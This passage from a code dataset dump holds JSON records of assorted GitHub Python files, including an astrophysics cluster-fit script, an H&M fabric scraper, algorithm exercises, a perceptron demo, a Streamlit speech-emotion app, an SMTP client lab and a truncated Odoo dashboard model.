get_ichrone\nfrom isochrones.priors import FehPrior, FlatLogPrior\n\n\ntry:\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\nexcept ImportError:\n rank = 0\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-N', type=int, default=40)\nparser.add_argument('--name', type=str, default='test-binary')\nparser.add_argument('--age', type=float, default=8.56, help='log10(age [yr])')\nparser.add_argument('--feh', type=float, default=-0.42)\nparser.add_argument('--distance', type=float, default=200)\nparser.add_argument('--AV', type=float, default=0.02, help='V-band extinction')\nparser.add_argument('--alpha', type=float, default=-3, help='IMF index')\nparser.add_argument('--gamma', type=float, default=0.3, help='mass ratio index')\nparser.add_argument('--fB', type=float, default=0.5, help='binary fraction')\nparser.add_argument('--models', type=str, default='mist')\nparser.add_argument('--mineep', type=int, default=202)\nparser.add_argument('--maxeep', type=int, default=605)\nparser.add_argument('--maxAV', type=float, default=0.1)\nparser.add_argument('--overwrite', '-o', action='store_true')\nparser.add_argument('--nlive', type=int, default=1000)\n\nargs = parser.parse_args()\n\n\nif rank == 0:\n ic = get_ichrone(args.models)\n\n pars = [args.age, args.feh, args.distance,\n args.AV, args.alpha, args.gamma, args.fB]\n print(pars)\n cat = simulate_cluster(args.N, *pars)\n print(cat.df.describe())\n\n cat.df.to_hdf('{}_stars.h5'.format(args.name), 'df')\n\n model = StarClusterModel(ic, cat, eep_bounds=(args.mineep, args.maxeep),\n max_distance=args.distance*3, max_AV=args.maxAV, name=args.name)\n model.set_prior(feh=FehPrior(halo_fraction=0.5), age=FlatLogPrior((6, 9.5)))\n\n print('lnprior, lnlike, lnpost: {}'.format([model.lnprior(pars),\n model.lnlike(pars),\n model.lnpost(pars)]))\n\nelse:\n model = None\n\nmodel = comm.bcast(model, root=0)\nmodel.fit(overwrite=args.overwrite, n_live_points=args.nlive, init_MPI=False)\n","repo_name":"timothydmorton/isochrones","sub_path":"scripts/test-clusterfit.py","file_name":"test-clusterfit.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"21"} +{"seq_id":"15035228153","text":"muteKey = \"[\"\nexitKey = \"escape\"\nunmuteKey = \"]\"\nrunning = False\n\n\n# functions to modify variables called from ui\ndef modify_MuteKey(newMute):\n global muteKey\n if newMute == \"\":\n muteKey = muteKey\n else:\n muteKey = newMute\n\n\ndef modify_UnmuteKey(newUnmute):\n global unmuteKey\n if newUnmute == \"\":\n unmuteKey = unmuteKey\n else:\n unmuteKey = newUnmute\n\n\ndef modify_ExitKey(newExit):\n global exitKey\n if newExit == \"\":\n exitKey = exitKey\n else:\n exitKey = newExit\n","repo_name":"alexCE-99/MuteApp","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30564735258","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n##===-----------------------------------------------------------------------------*- Python -*-===##\n## _ _ \n## | | | | \n## __ _| |_ ___| | __ _ _ __ __ _ \n## / _` | __/ __| |/ _` | '_ \\ / _` |\n## | (_| | || (__| | (_| | | | | (_| |\n## \\__, |\\__\\___|_|\\__,_|_| |_|\\__, | - GridTools Clang DSL\n## __/ | __/ |\n## |___/ |___/ \n##\n##\n## This file is distributed under the MIT License (MIT). 
\n## See LICENSE.txt for details.\n##\n##===------------------------------------------------------------------------------------------===##\n\nfrom optparse import OptionParser\n\nfrom .config import Config\nfrom .error import report_fatal_error\nfrom .parser import parse\nfrom .runner import run\n\n\ndef main():\n parser = OptionParser(\"gtclang-tester.py [directories] [options]\")\n\n parser.add_option(\"--gtclang\", dest=\"gtclang\",\n help=\"path to the gtclang executable\", metavar=\"PATH\")\n parser.add_option(\"--cxx\", dest=\"cxx\",\n help=\"path to the c++ compiler used to compile gridtools C++ code\",\n metavar=\"PATH\")\n parser.add_option(\"--gridtools_flags\", dest=\"gridtools_flags\",\n help=\"semicolon separated list of compile flags required to compile gridtools C++ code\",\n metavar=\"FLAGS\")\n parser.add_option(\"--no-progressbar\", dest=\"no_progressbar\", action=\"store_true\",\n help=\"Don't show any progressbar\")\n parser.add_option(\"-v\", \"--verbose\", dest=\"verbose\", action=\"store_true\",\n help=\"verbose logging\")\n parser.add_option(\"-g\", \"--generate-reference\", dest=\"generate_reference\", action=\"store_true\",\n help=\"generate reference file for file commands\")\n\n (options, args) = parser.parse_args()\n\n if options.generate_reference:\n Config.generate_reference = True\n\n if options.gtclang:\n Config.gtclang = options.gtclang\n\n if options.verbose:\n Config.verbose = True\n\n if options.gridtools_flags:\n Config.gridtools_flags = options.gridtools_flags\n\n if options.cxx:\n Config.cxx = options.cxx\n\n if options.no_progressbar:\n Config.no_progressbar = True\n\n if not args:\n report_fatal_error('no input directories given')\n\n tests = parse(args)\n return run(tests)\n","repo_name":"MeteoSwiss-APN/gtclang","sub_path":"test/utils/gtclang-tester/gtclang_tester/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"10611980367","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport time\nimport io\nfrom datetime import datetime\nimport re\nimport os\nimport json\n\ndef fabric_function(link):\n base_url = 'https://www2.hm.com'\n url = base_url + link\n\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36'\n }\n\n with requests.Session() as session:\n retries = 3 # Maximum number of retries\n delay = 2 # Delay between retries in seconds\n\n for attempt in range(retries):\n try:\n req = session.get(url, headers=headers)\n req.raise_for_status() # Raise an exception if the request was unsuccessful\n break # If successful, exit the retry loop\n except (requests.RequestException, ConnectionError):\n if attempt < retries - 1:\n time.sleep(delay)\n continue\n else:\n raise # If all retries fail, raise the exception\n soup = bs(req.content, 'html.parser')\n\n fabric = \"\"\n #initialise composition_element\n composition_element = None\n # Find the specific <div> element with id=\"section-materialsAndSuppliersAccordion\"\n try:\n div_element = soup.find('div', {'id': 'section-materialsAndSuppliersAccordion'})\n composition_element = div_element.find('h3', text='Composition')\n except:\n pass\n if composition_element:\n # Find all <h4> elements that represent different materials (e.g., Shell, Pocket lining)\n material_headers = div_element.find_all('h4')\n if material_headers:\n for header in 
material_headers:\n # Get the material name (e.g., Shell, Pocket lining)\n material_name = header.text.strip()\n\n # Get the <p> element containing the material information\n material_info = header.find_next('p')\n\n # Extract the text content of the <p> element\n material_text = material_info.get_text(strip=True)\n\n # Append the material information with the corresponding tag\n fabric += f\",[{material_name}] {material_text} \"\n else:\n fabric = \",[Material] \"\n for x in div_element.find_all('li'):\n for y in x.find_all('p'):\n fabric = fabric + y.text\n try:\n additional_info_h3 = div_element.find('h3', text=' Additional material information')\n recycled_info_list = additional_info_h3.find_next('ul').find_all('li', text=lambda text: 'Recycled' in text or 'Organic' in text)\n\n if recycled_info_list:\n # Extract the text content of all the <li> elements containing \"Recycled\" information and store them in a list\n recycled_texts = [item.get_text(strip=True) for item in recycled_info_list]\n # Join all the elements in the list to form a single string\n recycled_info = \", \".join(recycled_texts)\n fabric += \", [Recycled] \" + recycled_info\n except:\n pass\n return fabric\n\nparams = {\n 'sort': 'stock',\n 'image-size': 'small',\n 'image': 'model',\n 'offset': \"1\",\n 'page-size': \"50\"}\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0'}\n\nretries = 3 # Maximum number of retries\ndelay = 2 # Delay between retries in seconds\n\nfor attempt in range(retries):\n try:\n req = requests.get(\n 'https://www2.hm.com/en_gb/ladies/new-arrivals/clothes/_jcr_content/main/productlisting.display.json',\n params=params,\n headers=headers)\n req.raise_for_status() # Raise an exception if the request was unsuccessful\n break # If successful, exit the retry loop\n except (requests.RequestException, ConnectionError):\n if attempt < retries - 1:\n time.sleep(delay)\n continue\n else:\n raise # If all retries fail, raise the exception\n\ninit = req.json()\n\npage_size = 500\ntotal_products = int(init['total'])\noffset = 0\ndf = pd.DataFrame()\nprint(total_products)\nwhile offset < total_products:\n params = {\n 'sort': 'stock',\n 'image-size': 'small',\n 'image': 'model',\n 'offset': str(offset),\n 'page-size': str(page_size)}\n\n retries = 3 # Maximum number of retries\n delay = 2 # Delay between retries in seconds\n\n for attempt in range(retries):\n try:\n req = requests.get(\n 'https://www2.hm.com/en_gb/ladies/new-arrivals/clothes/_jcr_content/main/productlisting.display.json',\n params=params,\n headers=headers)\n req.raise_for_status() # Raise an exception if the request was unsuccessful\n break # If successful, exit the retry loop\n except (requests.RequestException, ConnectionError):\n if attempt < retries - 1:\n time.sleep(delay)\n continue\n else:\n raise # If all retries fail, raise the exception\n\n data = req.json()\n new_df = pd.DataFrame(data['products']) \n new_df['fabric'] = new_df.link.apply(fabric_function)\n \n df = pd.concat([df, new_df], axis=0, ignore_index=True)\n offset += page_size\n\n\ndef read_the_csv(file):\n df = pd.read_csv(file)\n return df\n\n# split the material string into three lists [main material], [secondary material], [recycled material]\ndef parse_material_compositions(materialstring, recycled_tag='Recycled'):\n try:\n splitup = (materialstring.split(\",\"))\n except:\n return [[],[],[]]\n lists = []\n newlist = []\n for i in splitup:\n i = i.strip()\n if len(i) == 0:\n continue\n if i[0] == 
\"[\":\n try:\n # If new list is empty do not append\n if newlist:\n lists.append(newlist)\n except: \n pass\n newlist = []\n newlist.append(i)\n lists.append(newlist)\n # clean square bracket tag from lists except recycled\n for l in lists:\n try:\n b = l[0].split('] ')\n l[0] = b[1]\n \n if b[0] == \"[Recycled\": \n l.insert(0, \"Recycled\")\n except: \n pass\n return lists\n\ndef get_recycled(lists):\n # recycled list is the one where the first element is 'Recycled'\n for i in lists:\n try:\n if(i[0] == \"Recycled\"):\n return i[1:]\n except:\n pass\n\ndef get_main(lists):\n # Main is always first list\n return lists[0]\n\ndef get_secondary(lists):\n # Obsolete however if needed returns list that is not recycled and not first\n if len(lists) <2:\n return\n secondary = []\n for i in lists[1:]:\n if(i[0] == \"Recycled\"):\n continue\n secondary.append(i)\n if len(secondary) == 0:\n return\n return secondary\n\ndef remove_trademark_symbol(input_string):\n # Define a regular expression pattern to match the trademark symbol (\\u2122 and \\U00002122) in a case-insensitive manner\n pattern = r'\\\\[Uu]([0-9a-fA-F]{4,8})'\n # Use re.sub() to replace all occurrences of the pattern with an empty string\n cleaned_string = re.sub(pattern, '', input_string)\n return cleaned_string\n\ndef split_material_and_percentage(input_string):\n # Define a regular expression pattern to match the material and percentage parts\n pattern = r'^(.*?)(\\d+\\%)$'\n # Use the re.match function to find the pattern in the input_string\n match = re.match(pattern, input_string)\n if match:\n # The first group (index 1) contains the material part\n material = match.group(1).strip()\n # The second group (index 2) contains the percentage part\n percentage = match.group(2).strip()\n material = remove_trademark_symbol(material)\n return material, percentage\n else:\n # If no match is found, return the entire string as material and an empty string for percentage\n return input_string.strip(), \"\"\n\ndef add_columns_and_values(df):\n # Iterate through each row of the DataFrame\n for index, row in df.iterrows():\n composition_list = get_main((parse_material_compositions(row[\"fabric\"])))\n # Extracting the material name and percentage from the list\n for item in composition_list:\n try:\n material, percentage = split_material_and_percentage(item)\n percentage = float(percentage.strip('%'))\n # Adding a new column to the DataFrame if it doesn't exist\n if material.upper() not in df.columns:\n df[material.upper()] = 0 # Initializing the column with None\n # Assigning the percentage value to the corresponding cell\n df.at[index, material.upper()] = percentage\n except:\n # old fabric function may of failed so we will try the link again to get the materials\n link = str(row['link'])\n new_fabric_value = fabric_function(link)\n df.at[index, 'fabric'] = new_fabric_value \n composition_list = get_main((parse_material_compositions(new_fabric_value)))\n # Extracting the material name and percentage from the list\n for item in composition_list:\n try:\n material, percentage = split_material_and_percentage(item)\n percentage = float(percentage.strip('%'))\n # Adding a new column to the DataFrame if it doesn't exist\n if material.upper() not in df.columns:\n df[material.upper()] = 0 # Initializing the column with None\n # Assigning the percentage value to the corresponding cell\n df.at[index, material.upper()] = percentage\n except:\n pass\n pass\n return df\n\n\ndef add_recycled_columns_and_values(df):\n for index, row in df.iterrows():\n 
composition_list = get_recycled((parse_material_compositions(row[\"fabric\"])))\n if composition_list:\n for item in composition_list:\n try:\n material, percentage = split_material_and_percentage(item)\n material = 'Sustainable ' + material\n percentage = float(percentage.strip('%'))\n # Adding a new column to the DataFrame if it doesn't exist\n if material.upper() not in df.columns:\n df[material.upper()] = 0 # Initializing the column with None\n # Assigning the percentage value to the corresponding cell\n df.at[index, material.upper()] = percentage\n except:\n pass\n return df\n\ndef process_build_file(df, dt):\n materialsdf =add_columns_and_values(df)\n recycledmaterialsdf =add_recycled_columns_and_values(materialsdf)\n recycledmaterialsdf['Date'] = dt\n return recycledmaterialsdf;\n\ndef dataframe_to_json(df):\n json_string = df.to_json(orient='records')\n return json_string\n\ncurrent_datetime = datetime.now().strftime('%Y%m%d-%H%M%S')\ndf = process_build_file(df, current_datetime)\ncsv_filename = f\"data/data_{current_datetime}.csv\"\n\n# Save the DataFrame to the CSV file\ndf.to_csv(csv_filename, index=False)\n\n# Obsolete print (no longer used)\nprint(dataframe_to_json(df))\n","repo_name":"ZoeCrg/MSc_Dissertation","sub_path":"hm_scrape.py","file_name":"hm_scrape.py","file_ext":"py","file_size_in_byte":11613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17088306095","text":"def binary_search(ara, left, right, target):\n if left > right:\n return -1\n\n while left <= right:\n mid = (left + right) // 2\n if ara[mid] == target:\n return mid\n if ara[mid] < target:\n left = mid + 1\n else:\n right = mid - 1\n\n return -1 # not found\n\ndef two_sum_v1(numbers):\n numbers.sort()\n n = len(numbers)\n for i in range(n-1):\n target = 0 - numbers[i]\n target_index = binary_search(numbers, i+1, n-1, target)\n if target_index > i:\n return numbers[i], numbers[target_index]\n\ndef two_sum_v2(numbers):\n found = dict()\n for n in numbers:\n m = 0 - n # or m = n * -1\n try:\n if found[m]:\n return m, n\n except KeyError:\n found[n] = 1\n \ndef two_sum_v3(numbers):\n numbers.sort()\n n = len(numbers)\n k = n - 1\n for i in range(n-1):\n for j in range(k, -1, -1):\n if numbers[i] + numbers[j] == 0:\n return numbers[i], numbers[j]\n if numbers[i] + numbers[j] < 0:\n k = j\n break\n\ndef two_sum_v4(numbers):\n numbers.sort()\n n = len(numbers)\n i, j = 0, n-1\n while i < j:\n if numbers[i] + numbers[j] == 0:\n return numbers[i], numbers[j]\n if numbers[i] + numbers[j] < 0:\n i += 1\n else:\n j -= 1\n\n\nif __name__ == \"__main__\":\n numbers = [8, 3, 6, -1, -4, 4, 3, 9, -7]\n print(two_sum_v1(numbers))\n print(two_sum_v2(numbers))\n print(two_sum_v3(numbers))\n print(two_sum_v4(numbers))","repo_name":"tamim/codinginterviewbook","sub_path":"two_sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"21"} +{"seq_id":"36715544001","text":"# This is a sample Python script.\nfrom matplotlib import pyplot as plt\nfrom numpy import array, dot, zeros, random\nimport matplotlib.pyplot\nfrom random import choice\nimport sklearn\nimport pandas\n#import tensorflow\n# import keras\n\n\"\"\"\nSTRG+SHIFT+I Definition\nSHIFT+ALT+UP or DOWN Zeile verschieben\nALT+UP or DOWN\nSTRG+ALT+LEFT or RIGHT Navigation der Positionen\n\n\"\"\"\n# Press Umschalt+F10 to execute it or replace it with your code.\n# Press Double Shift to search 
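# the update in fit() below implements the perceptron learning rule w <- w + (y - y_hat) * x with learning rate 1;\n# heaviside() keeps y_hat in {0, 1}, so each error is -1, 0 or 1 and w only changes on a misclassified sample\n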
def fit(iterations, training_data_set, w):\n    errors = []\n    weights = []\n    for i in range(iterations):\n        training_data = choice(training_data_set)\n        x = training_data[0]\n        y = training_data[1]\n        y_hat = heaviside(dot(w, x))\n        error = y - y_hat\n        errors.append(error)\n        weights.append(w)\n        w += error * x\n    return errors, weights\n\n\n\ndef print_hi(name):\n    # Use a breakpoint in the code line below to debug your script.\n    print(f'Hi, {name}')  # Press Ctrl+F8 to toggle the breakpoint.\n\ndef main():\n    training_data_set = [\n        (array([1, 0, 0]), 0),\n        (array([1, 0, 1]), 1),\n        (array([1, 1, 0]), 1),\n        (array([1, 1, 1]), 1),\n    ]\n\n    random.seed(12)\n    w = zeros(3)\n    iterations = 30\n    errors, weights = fit(iterations, training_data_set, w)\n    w = weights[iterations - 1]\n    print(\"Weight vector at the end of training:\")\n    print(w)\n\n    print(\"Evaluation at the end of training\")\n    for x, y in training_data_set:\n        y_hat = heaviside(dot(x, w))\n        print(\"{}: {} -> {}\".format(x, y, y_hat))\n\n    fignr = 1\n    plt.figure(fignr, figsize=(10, 10))\n    plt.plot(errors)\n    plt.style.use('seaborn-whitegrid')\n    plt.xlabel('Iteration')\n    plt.ylabel(r\"$(y - \\hat y)$\")\n    plt.show()\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n    # print_hi('PyCharm')\n    main()\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"henshow/ki-nb-neu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"1585319612","text":"'''Write a program that asks for the three sides of a triangle. The program should report whether the values can\nform a triangle. If the sides do form a triangle, indicate whether it is: equilateral, isosceles or scalene.'''\n\n\nlado_1 = int(input(\"Side 1: \"))\nlado_2 = int(input(\"Side 2: \"))\nlado_3 = int(input(\"Side 3: \"))\n\nif lado_1 > (lado_2 + lado_3) or lado_2 > (lado_1 + lado_3) or lado_3 > (lado_1 + lado_2):\n    print('Cannot form a triangle')\nelif lado_1 == lado_2 == lado_3:\n    print('Equilateral')\nelif lado_1 == lado_2 or lado_1 == lado_3 or lado_2 == lado_3:\n    print('Isosceles')\nelse:\n    print('Scalene')\n","repo_name":"Lia-Pires/DB1Start","sub_path":"02_estruturas_condicionais_exercicios/ex014_estruturas_condicionais.py","file_name":"ex014_estruturas_condicionais.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73993300214","text":"# import necessary modules\nimport streamlit as st\nimport random\n\n# import app modules (controller, service, and view)\nfrom controller.df_dataset import dataset_df\nfrom controller.mfcc import create_mfcc, create_resized_mfcc\nfrom controller.cnn import train, test, predict\nfrom service.split_data import make_train_test_split\nfrom view.plot import distribution, show_random_plot, confusion_matrix, show_mfcc, plot_history\nfrom view.config import get_config\n\n# prepare current page config, set the page's title\nget_config(\"Machine Modeling\")\n\n# prepare all needed session states to make interactive interaction\nif \"preprocessing\" not in st.session_state: st.session_state[\"preprocessing\"] = False\nif \"train\" not in st.session_state: st.session_state[\"train\"] = False\nif \"test\" not in st.session_state: st.session_state[\"test\"] = False\nif \"model\" not in st.session_state: st.session_state[\"model\"] = False\nif \"x_mean\" not in st.session_state: st.session_state[\"x_mean\"] = False\nif \"x_std\" not in st.session_state: st.session_state[\"x_std\"] = False\n\n# start the machine modeling page\n# used for preprocessing dataset, training and testing model\ndef start():\n    # show the page title\n    st.write(\"<h1 style='text-align: center;'>Machine Modeling</h1>\", unsafe_allow_html = True)\n\n    # show training dataset section\n    st.write(\"### Training Dataset\")\n    # set imported dataset to global\n    global df\n    # load dataset\n    df = dataset_df('dataset')\n    # show dataset\n    st.dataframe(df, 500)\n\n    # show message and button for next interaction (preprocessing)\n    st.write(\"The dataset has been loaded, let's preprocess it!\")\n    # set the preprocessing state to true if user click the button\n    if st.button(\"Preprocessing\", type = \"primary\"):\n        st.session_state[\"preprocessing\"] = True\n    \n# preprocessing function to start preprocessing\ndef preprocessing():\n    # show sample distribution\n    st.write(\"### Sample Distribution\")\n    distribution(df)\n\n    # randomly pick one sample\n    st.write(\"### Random Pick Sample\")\n    # split dataset to happy and sad based on their label, reset the dataframe index\n    happy_df = df.loc[df[\"Label\"] == \"happy\"].reset_index(drop = True)\n    sad_df = df.loc[df[\"Label\"] == \"sad\"].reset_index(drop = True)\n\n    # plot 1 happy and 1 sad dataset\n    st.write(\"#### Happy\")\n    show_random_plot(happy_df)\n    st.write(\"#### Sad\")\n    show_random_plot(sad_df)\n\n    # create the mfcc from each audio path\n    mfccs = create_mfcc(df)\n    # set the new_mfccs as global to be used in other function\n    global new_mfccs\n    # get the new mfccs (with the equal column number) and get the average column number of old mfccs\n    
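# note: each MFCC matrix has a fixed number of coefficients but a variable-length time axis, so the\n    # matrices are resized to a common column count here before being split into train/validation/test arrays\n    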
new_mfccs, average_cols = create_resized_mfcc(mfccs)\n\n    # show the average mfccs column (old mfccs)\n    st.write(\"### Average MFCCs Column\")\n    st.metric(\"Average\", average_cols)\n\n    # pick one random index to show the difference of old and new mfcc\n    index = random.randint(0, df.shape[0] - 1)\n    # show picked mfcc, before and after equalization\n    st.write(\"### MFCC Comparison\")\n    show_mfcc(df.Path[index], new_mfccs[index])\n\n    # x_tr => training data, y_tr => training label\n    # x_va => validation data, y_va => validation label\n    # x_te => testing data, y_te => testing label\n    global x_tr, y_tr, x_va, y_va, x_te, y_te\n\n    # split the dataset into training, validation, and testing\n    x_tr, y_tr, x_va, y_va, x_te, y_te = make_train_test_split(new_mfccs, df)\n\n    # show the shape of mfccs distribution (training, validation, testing)\n    st.write(\"### MFCCs Distribution\")\n    col1, col2, col3 = st.columns(3)\n    col1.metric(\"Train\", str(x_tr.shape))\n    col2.metric(\"Validation\", str(x_va.shape))\n    col3.metric(\"Test\", str(x_te.shape))\n\n# start training process\ndef start_train():\n    # show the training process section\n    st.write(\"### Training Process\")\n    # start training\n    model, history = train(x_tr, y_tr, x_va, y_va)\n    # store the trained model in session state to be used in another function and page\n    st.session_state[\"model\"] = model\n    # plot the training history (loss, validation loss, accuracy, and validation accuracy)\n    plot_history(history)\n\n# start testing process\ndef start_test():\n    # show the testing process section\n    st.write(\"### Testing Process\")\n    # get the trained model from session state\n    trained_model = st.session_state[\"model\"]\n    # test the model using testing data (return the loss and accuracy)\n    loss, accuracy = test(trained_model, x_te, y_te)\n    # get the prediction, precision, recall, and f1 score\n    prediction, precision, recall, f1 = predict(trained_model, x_te, y_te)\n\n    # display the testing metrics (loss, accuracy, precision, recall, and f1)\n    col1, col2, col3, col4, col5 = st.columns(5)\n    col1.metric(\"Loss\", \"{:.4f}\".format(loss))\n    col2.metric(\"Accuracy\", \"{:.4f}\".format(accuracy))\n    col3.metric(\"Precision\", \"{:.4f}\".format(precision))\n    col4.metric(\"Recall\", \"{:.4}\".format(recall))\n    col5.metric(\"F1\", \"{:.4}\".format(f1))\n\n    # plot the confusion matrix\n    st.write(\"### Confusion Matrix\")\n    confusion_matrix(y_te, prediction)\n\n# call the start() function on first page load\nif __name__ == \"__main__\":\n    start()\n\n# if the preprocessing state is true\nif st.session_state[\"preprocessing\"]:\n    # start preprocessing\n    preprocessing()\n    # show message and button for next interaction (testing)\n    st.write(\"The dataset has been preprocessed, let's train it with the CNN!\")\n    # if training button pressed, change train state to true\n    if st.button(\"Training\", type = \"primary\"):\n        st.session_state[\"train\"] = True\n\n# if the train state is true\nif st.session_state[\"train\"]:\n    # start training process\n    start_train()\n    # show message and button for next interaction (testing)\n    st.write(\"Model training finished, let's check the accuracy on the testing dataset!\")\n    # if testing button pressed, change test state to true\n    if st.button(\"Testing\", type = \"primary\"):\n        st.session_state[\"test\"] = True\n\n# if the test state is true\nif st.session_state[\"test\"]:\n    # start testing process\n    start_test()\n\n# code by @tudemaha","repo_name":"tudemaha/speech-emotion-classification","sub_path":"view/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"11809232295","text":"import base64\nfrom socket import *\n\nfrom pip._vendor.distlib.compat import raw_input\n\nmsg = \"\\r\\n I love computer networks!\"\n\nendmsg = \"\\r\\n.\\r\\n\"\n\n# Choose a mail server (e.g. Google mail server) and call it mailserver\n\n# Create socket called clientSocket and establish a TCP connection with mailserver\n\n
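# note: smtp2go also exposes SMTP on non-standard ports such as 2525 and 80 (useful where port 25 is\n# blocked by the network), which appears to be why port 80 is used below instead of the usual SMTP port 25\n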
# Fill in start\nMailServer = \"mail.smtp2go.com\"\nMailPort = 80\nserverPort = (MailServer, MailPort)\nclientSocket = socket(AF_INET, SOCK_STREAM)\nclientSocket.connect(serverPort)\n\nrecv = clientSocket.recv(1024)\nprint(\"Message after connection request: \", recv.decode())\n\nif recv.decode()[:3] != '220':\n    print('220 reply not received from server.\\n')\n# Fill in end\n\n\n# Send HELO command and print server response.\n\nhelloCommand = 'HELO Alice\\r\\n'\nclientSocket.send(helloCommand.encode())\nrecv1 = clientSocket.recv(1024)\nprint(\"\\nSend HELO command and print server response:\", recv1.decode())\n\nif recv1.decode()[:3] != '250':\n    print('250 reply not received from server.\\n')\n\n# Fill in start\nmailFromCommand = 'MAIL FROM: <sender@email.com> \\r\\n'\nclientSocket.send(mailFromCommand.encode())\nrecv2 = clientSocket.recv(1024)\nprint(\"After MAIL FROM command:\", recv2.decode())\n# Fill in end\n\n# Send RCPT TO command and print server response.\n\n# Fill in start\nrcptTo = \"RCPT TO: <destination@email.com> \\r\\n\"\nclientSocket.send(rcptTo.encode())\nrecv3 = clientSocket.recv(1024)\nprint(\"After RCPT TO command: \", recv3.decode())\nif recv3.decode()[:3] != '250':\n    print('250 reply not received from server.\\n')\n\n# Fill in end\n\n# Send DATA command and print server response.\ndataCommand = 'DATA\\r\\n'\n# Fill in start\nclientSocket.send(dataCommand.encode())\nrecv4 = clientSocket.recv(1024)\nprint(\"After DATA command: \", recv4.decode())\nif recv4.decode()[:3] != '354':\n    print('354 reply not received from server.\\n')\n# Fill in end #\n\n# Send message data.\n\n# Fill in start\nsubject = \"Subject: SMTP mail client testing \\r\\n\\r\\n\"\nclientSocket.send(subject.encode())\n\nmessage = raw_input(\"Enter message here: \\r\\n\")\n\n# Fill in end\n\n# Message ends with a single period.\nmailEndMsg = \"\\r\\n.\\r\\n\"\n\n# Fill in start\nclientSocket.send(message.encode())\nclientSocket.send(mailEndMsg.encode())\n\nrecv5 = clientSocket.recv(1024)\nprint(\"Response after sending message body:\", recv5.decode())\n\n# Fill in end\n\n# Send QUIT command and get server response.\n\n# Fill in start\nquitCommand = \"QUIT\\r\\n\"\nclientSocket.send(quitCommand.encode())\nrecv6 = clientSocket.recv(1024)\nprint(recv6.decode())\nprint(quitCommand)\n# Fill in end\nclientSocket.close()\n","repo_name":"Khoameocr85/SMTPlab","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"22971747669","text":"from xml.etree import ElementTree\nfrom odoo import models, fields, api, _\nimport datetime\nimport pytz\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass DashboardProject(models.Model):\n    _name = 'vnitpro.project.dashboard'\n\n    name = fields.Char('Name', compute=\"_compute_by_status\", translate=True, store=True)\n    status = fields.Selection(\n        [(1, 
'Project Draft'), (2, 'Project Confirmed'), (3, 'In Process'), (4, 'Finish'), (5, 'On Hold'),\n (6, 'Cancel')], 'Status', default=1, required=True)\n\n color = fields.Integer('Color', default=3)\n\n count_record = fields.Integer('Count Record', compute=\"_compute_by_status\")\n count_expire_today = fields.Integer('Count Expire Today', compute=\"_compute_by_status\")\n count_out_of_date = fields.Integer('Count Out Of Date', compute=\"_compute_by_status\")\n count_unexpired = fields.Integer('Count Unexpired', compute=\"_compute_by_status\")\n\n def get_today(self):\n time = datetime.datetime.now()\n tz_current = pytz.timezone(self._context.get('tz') or 'UTC') # get timezone user\n tz_database = pytz.timezone('UTC')\n time = tz_database.localize(time)\n time = time.astimezone(tz_current)\n today_w_timezone = time.strftime('%Y-%m-%d')\n return today_w_timezone\n\n def get_context_with_status(self):\n context = {}\n # (1, 'Project Draft'), (2, 'Project Confirmed'), (3, 'In Process'), (4, 'Finish'), (5, 'On Hold'), (6, 'Cancel')\n if self.status == 1:\n context = {'search_default_project_draft': 1}\n elif self.status == 2:\n context = {'search_default_project_confirmed': 1}\n elif self.status == 3:\n context = {'search_default_project_in_process': 1}\n elif self.status == 4:\n context = {'search_default_project_finish': 1}\n elif self.status == 5:\n context = {'search_default_project_on_hold': 1}\n elif self.status == 6:\n context = {'search_default_project_cancel': 1}\n return context\n\n def get_action_project_with_status(self):\n context = self.get_context_with_status()\n return {\n 'name': self.display_name,\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'vnitpro.project',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'nodestroy': True,\n 'context': str(context)\n }\n\n def get_action_picking_tree_expire_today(self):\n context = {'search_default_expire_today': 1}\n context.update(self.get_context_with_status())\n return {\n 'name': self.display_name,\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'vnitpro.project',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'nodestroy': True,\n 'context': str(context)\n }\n\n def get_action_picking_tree_unexpired(self):\n context = {'search_default_unexpired': 1}\n context.update(self.get_context_with_status())\n return {\n 'name': self.display_name,\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'vnitpro.project',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'nodestroy': True,\n 'context': str(context)\n }\n\n def get_action_picking_tree_out_of_date(self):\n context = {'search_default_out_of_date': 1}\n 